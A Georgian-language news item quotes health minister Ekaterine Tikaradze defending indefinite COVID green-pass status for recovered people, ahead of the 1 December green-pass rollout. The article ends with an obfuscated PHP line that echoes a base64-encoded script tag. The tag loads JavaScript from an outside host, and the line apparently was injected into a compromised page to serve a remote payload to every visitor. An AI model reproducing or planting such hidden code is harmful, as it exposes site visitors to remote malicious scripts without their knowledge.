celsiusi
ავერსი საქკაბელი
ჯანდაცვის მინისტრი ეკატერინე ტიკარაძე კოვიდგადატანილი პირებისთვის უვადოდ მწვანე სტატუსის მინიჭებასთან დაკავშირებით ამბობს, რომ არ არის ცუდი გადაწყვეტილება, "დაძაბული სოციალური, ეკონომიკური და პანდემიური ფონის პირობებში საქართველოს მოქალაქეებს მეტი მოქნილობა ჰქონდეთ".
 
ჟურნალისტებმა მინისტრს ჰკითხეს, თუ არის მსოფლიოში საქართველოსნაირი სხვა ქვეყანა, სადაც იგივენაირად ხდება, რაზეც მან უპასუხა:
 
"ზოგადად საქართველოსნაირი ქვეყანა მეორე მსოფლიოში არსად არ არის და ჩვენ ყველაფერში განსაკუთრებულები ვართ და სწორედ აქედან გამომდინარე, ასევე განსაკუთრებულები ვართ ორი მწვანე პასპორტით, უვადო პასპორტით და ეს ყველაფერი გამომდინარეობს ალბათ ჩვენი გენეტიკიდან და ჩვენი ხასიათიდან. ჩვენ თითოეული მათგანი ვართ ქართველი და არამგონია, რომ ვინმეს ეს უკვირდეს", - თქვა ტიკარაძემ.
 
მისი თქმით, მიაჩნია, რომ მნიშვნელოვანია, საზოგადოება ეტაპობრივად შეეგუოს ცვლილებებს.
 
"ჩვენ გაგვაჩნია ყველას ჩვენი კონკრეტული დამოკიდებულება. მე პირადად ვთვლი, რომ მნიშვნელოვანია, საზოგადოება ეტაპობრივად შეეგუოს იმ მნიშვნელოვან ცვილებებს, რომელიც მსოფლიოში მიმდინარეობს და თუ ეს სხვა ქვეყნის მოქალაქეებისთვის გაცილებით უფრო მარტივია, გაყვეს გარკვეულ წესებს, საქართველოში ეს რატომღაც დღემდე კიდევ უფრო რთულია, აქედან გამომდინარე, იმ დაძაბული სოციალური, ეკონომიკური და პანდემიური ფონის პირობებში, ალბათ, არ არის ცუდი გადაწყვეტილება, რომ ჩვენს მოქალაქეებს მეტი მოქნილობა ექნებათ", - თქვა ტიკარაძემ.
 
საქართველოში 1-ლი დეკემბრიდან მწვანე პასპორტების სისტემა ამოქმედდება. მწვანე სტატუსი აქვთ პირს, ვინც ვაქცინირებულია, გადატანილი აქვს კორონავირუსი ან წარადგენს ვალიდურ PCR ან სწრაფ ტესტს. მწვანე პასპორტის გარეშე გარკვეულ ობიექტებში შესვლა აკრძალულია.
1167
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");